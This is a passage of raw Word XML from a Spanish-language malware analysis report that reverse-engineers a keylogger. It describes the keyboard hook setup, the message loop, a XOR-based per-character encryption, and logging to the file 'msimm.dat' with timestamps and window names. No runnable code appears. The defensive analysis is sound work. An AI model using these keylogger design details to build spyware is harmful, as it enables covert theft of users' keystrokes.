        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de código modificado para forzar salto a la zona del keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>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07FE42D4" wp14:editId="40568380">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12" w:name="_Toc19358231"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>92</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Llamada a SetWindowsHookExW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>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End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DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t>[83]</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51FFA016" wp14:editId="56AD5CFC">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13" w:name="_Toc19358232"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>93</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Llamada SetWindowsHookExW que establece función de hook para teclado.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p w:rsidR="00B16DA8" w:rsidRDefault="00B16DA8" w:rsidP="00333F53">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Aparentemente el mismo malware tiene previsto poder desactivar la función de keylogger pues existe una llamada a </w:t>
      </w:r>
      <w:r w:rsidRPr="00786A43">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>UnhookWindowsHookExw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A7CDA" w:rsidRDefault="003A7CDA" w:rsidP="00333F53">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>La función donde se hará todo el proceso de las pulsaciones del teclado es la que hemos etiquetado como «key</w:t>
      </w:r>
      <w:r w:rsidR="00B16DA8">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>oard_event_hook» y es el núcleo del keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A7CDA" w:rsidRDefault="003A7CDA" w:rsidP="003A7CDA">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53D50617" wp14:editId="2E577254">
            <wp:extent cx="5058000" cy="1292400"/>
            <wp:effectExtent l="133350" t="133350" r="142875" b="155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3" t="5338" r="1693"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5058000" cy="129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7CDA" w:rsidRDefault="003A7CDA" w:rsidP="003A7CDA">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="_Toc19358233"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>94</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra inicio hook de proceso de pulsaciones de teclas: keyboard_event_hook</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214"/>
    </w:p>
    <w:p w:rsidR="00333F53" w:rsidRPr="00333F53" w:rsidRDefault="003D1C1E" w:rsidP="00333F53">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tras establecer el hook vemos que vuelve a la función de inicio donde hay un bucle continuo el cual </w:t>
      </w:r>
      <w:r w:rsidR="00786A43">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>espera a recibir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserv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6BC9CF6A" wp14:editId="3826F99D">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15" w:name="_Toc19358234"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>95</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Bucle de proceso de mensajes del keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p w:rsidR="001C34FA" w:rsidRDefault="00E55E69" w:rsidP="00E55E69">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Una vez establecido este bucle el código del keylogger</w:t>
      </w:r>
      <w:r w:rsidR="00B16DA8">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> espera evento de teclado, y para cada pulsación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">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4A42C949" wp14:editId="7F30D9C5">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16" w:name="_Toc19358235"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>96</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Zona de código donde</w:t>
      </w:r>
      <w:r w:rsidR="00EA4460">
        <w:t xml:space="preserve"> crea el fichero “msimm.dat” en el disco</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>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101F5C1F" wp14:editId="1E1DC6FD">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bookmarkStart w:id="217" w:name="_Toc19358236"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>97</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Zona de memoria donde se muestra el string msimm.dat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>
    </w:p>
    <w:p w:rsidR="008578FA" w:rsidRDefault="008578FA" w:rsidP="00E76FF3">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00103F94" w:rsidRPr="00E76FF3" w:rsidRDefault="008C7FAE" w:rsidP="00E76FF3">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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77679473" wp14:editId="5BB6F6FD">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18" w:name="_Toc19358237"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>98</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Zona de código que establece cadena “KSL0” en memoria.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>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152E2174" wp14:editId="25C614F1">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19" w:name="_Toc19358238"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>99</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Código que realiza escritura en fichero de disco.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w:rsidR="00E76FF3" w:rsidRDefault="00F31469" w:rsidP="00E76FF3">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>A continuación, p</w:t>
      </w:r>
      <w:r w:rsidR="00E76FF3" w:rsidRPr="00E76FF3">
        <w:t>uesto</w:t>
      </w:r>
      <w:r w:rsidR="00B16DA8">
        <w:t xml:space="preserve"> que el Hook que se ha</w:t>
      </w:r>
      <w:r w:rsidR="00E76FF3">
        <w:t xml:space="preserve"> establecido</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B16DA8">
        <w:t xml:space="preserve"> es</w:t>
      </w:r>
      <w:r w:rsidR="00E76FF3">
        <w:t xml:space="preserve">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3B1E2510" wp14:editId="0E80A38B">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20" w:name="_Toc19358239"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE70E2">
        <w:t xml:space="preserve"> Llamada al siguiente hook de la cadena.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p w:rsidR="002F3991" w:rsidRDefault="002F3991" w:rsidP="00E76FF3">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Dentro de todo el</w:t>
      </w:r>
      <w:r w:rsidR="00771A12">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> proceso, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>se pueden observar diferentes funciones que identifican la tecla pulsada, la buscan dentro a de la lista de teclas mapeadas, formatea los datos y finalmente se llama a una subrutina de cifrado de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00263CAE" w:rsidRDefault="00AA5E34" w:rsidP="00E76FF3">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Este cifrado se hace j</w:t>
      </w:r>
      <w:r w:rsidR="008E7409">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">usto antes de la grabación en el fichero </w:t>
      </w:r>
      <w:r w:rsidR="008E7409" w:rsidRPr="002907E0">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>msimm.dat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008E7409">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Nos </w:t>
      </w:r>
      <w:r w:rsidR="008E7409">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">encontramos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">con </w:t>
      </w:r>
      <w:r w:rsidR="008E7409">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>un bucle que realiza diversas operaciones xor y div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> sobre una cadena, porque no solo graba la tecla, sino otra información como fecha, hora, y nombres de ventana de proceso.</w:t>
      </w:r>
      <w:r w:rsidR="00C5604B">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C5604B" w:rsidRDefault="00C5604B" w:rsidP="00E76FF3">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Este cifrado es muy similar al proceso del primer descifrado </w:t>
      </w:r>
      <w:r w:rsidR="00263CAE">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">comentado en el análisis estático, aunque el proceso es inverso, sigue la misma lógica. A partir de una tabla de </w:t>
      </w:r>
      <w:r w:rsidR="00263CAE">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">claves, obtiene una clave diferente para cada carácter a cifrar. Es decir, si solo se graban teclas como por ejemplo “F” o “K” tendrán la misma clave de cifrado, pero si tiene que guardar una tecla como por ejemplo “&lt;PgUp&gt;” o “&lt;Enter&gt;” la clave ira cambiando para cada carácter. Dicha clave se obtiene a partir del resto de una división que proporciona el índice de la tabla </w:t>
      </w:r>
      <w:r w:rsidR="00B54569">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>que tiene</w:t>
      </w:r>
      <w:r w:rsidR="00263CAE">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> la clave, y es</w:t>
      </w:r>
      <w:r w:rsidR="00B54569">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidR="00263CAE">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> clave se utiliza para realizar un xor. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F3991" w:rsidRDefault="00C5604B" w:rsidP="00C5604B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="780EBEF8" wp14:editId="68C12820">
            <wp:extent cx="5194300" cy="2044700"/>
            <wp:effectExtent l="114300" t="114300" r="139700" b="146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6" t="7936" r="1693" b="9626"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5194300" cy="2044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3991" w:rsidRDefault="002F3991" w:rsidP="002F3991">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="221" w:name="_Toc19358240"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>101</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Sección del cifrado de datos del keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
    </w:p>
    <w:p w:rsidR="00B54569"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El cifrado de datos es complejo,</w:t>
      </w:r>
      <w:r w:rsidR="00B54569">
        <w:rPr>
          <w:rStyle w:val="DescripcinCar"/>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> y solo se ha analizado superficialmente.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF72E8">
        <w:rPr>
          <w:rStyle w:val="DescripcinCar"/>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D0632F" w:rsidRPr="00DF72E8" w:rsidRDefault="00B54569" w:rsidP="00DF72E8">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w:t>
      </w:r>
      <w:r w:rsidR="00E05EE3" w:rsidRPr="00DF72E8">
        <w:rPr>
          <w:rStyle w:val="DescripcinCar"/>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">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00E05EE3"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="552D5387" wp14:editId="46EA3E34">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bookmarkStart w:id="222" w:name="_Toc19358241"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>102</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de formateo de fecha y hora y obtención de nombre de ventana activa.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
    </w:p>
    <w:p w:rsidR="00771A12" w:rsidRPr="00E05EE3" w:rsidRDefault="00014E52" w:rsidP="00E05EE3">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>También se pueden</w:t>
      </w:r>
      <w:r w:rsidR="00F832A9">
        <w:t xml:space="preserve"> ver diferentes llamadas a funciones de conversión</w:t>
      </w:r>
      <w:r w:rsidR="00D530A3">
        <w:t xml:space="preserve"> de tiempo que se realizan justo antes del formateo de fecha para grabarlo posteriormente a disco.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13EA8" w:rsidRDefault="008C7FAE" w:rsidP="00E13EA8">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23613AC4" wp14:editId="64183DEE">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1A12" w:rsidRDefault="00E13EA8" w:rsidP="00E13EA8">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="223" w:name="_Toc19358242"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>103</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Funciones de conversión de tiempo.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="223"/>
    </w:p>
    <w:p w:rsidR="00DA3C54" w:rsidRPr="001F0FE3" w:rsidRDefault="00CE3025" w:rsidP="001F0FE3">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r w:rsidRPr="001F0FE3">
        <w:t>Llegamos a un punto donde se identifica claramente</w:t>
      </w:r>
      <w:r w:rsidR="00AA5E34">
        <w:t xml:space="preserve"> en memoria</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0FE3">
        <w:t xml:space="preserv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110CAD4E" wp14:editId="2E6134A5">
            <wp:extent cx="4749800" cy="863600"/>
            <wp:effectExtent l="133350" t="114300" r="127000"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93" b="6977"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4752000" cy="86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bookmarkStart w:id="224" w:name="_Toc19358243"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>104</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de cadena de texto formateada con datos del sistema.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="224"/>
    </w:p>
    <w:p w:rsidR="00730065" w:rsidRDefault="00730065" w:rsidP="00730065">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Tras este</w:t>
      </w:r>
      <w:r w:rsidR="002907E0">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> cifrado de datos se encuentra el código que se encarga de guardar los datos en el fichero.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A5084" w:rsidRDefault="006A5084" w:rsidP="00730065">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="622D7754" wp14:editId="0547C61C">
            <wp:extent cx="4327200" cy="2203200"/>
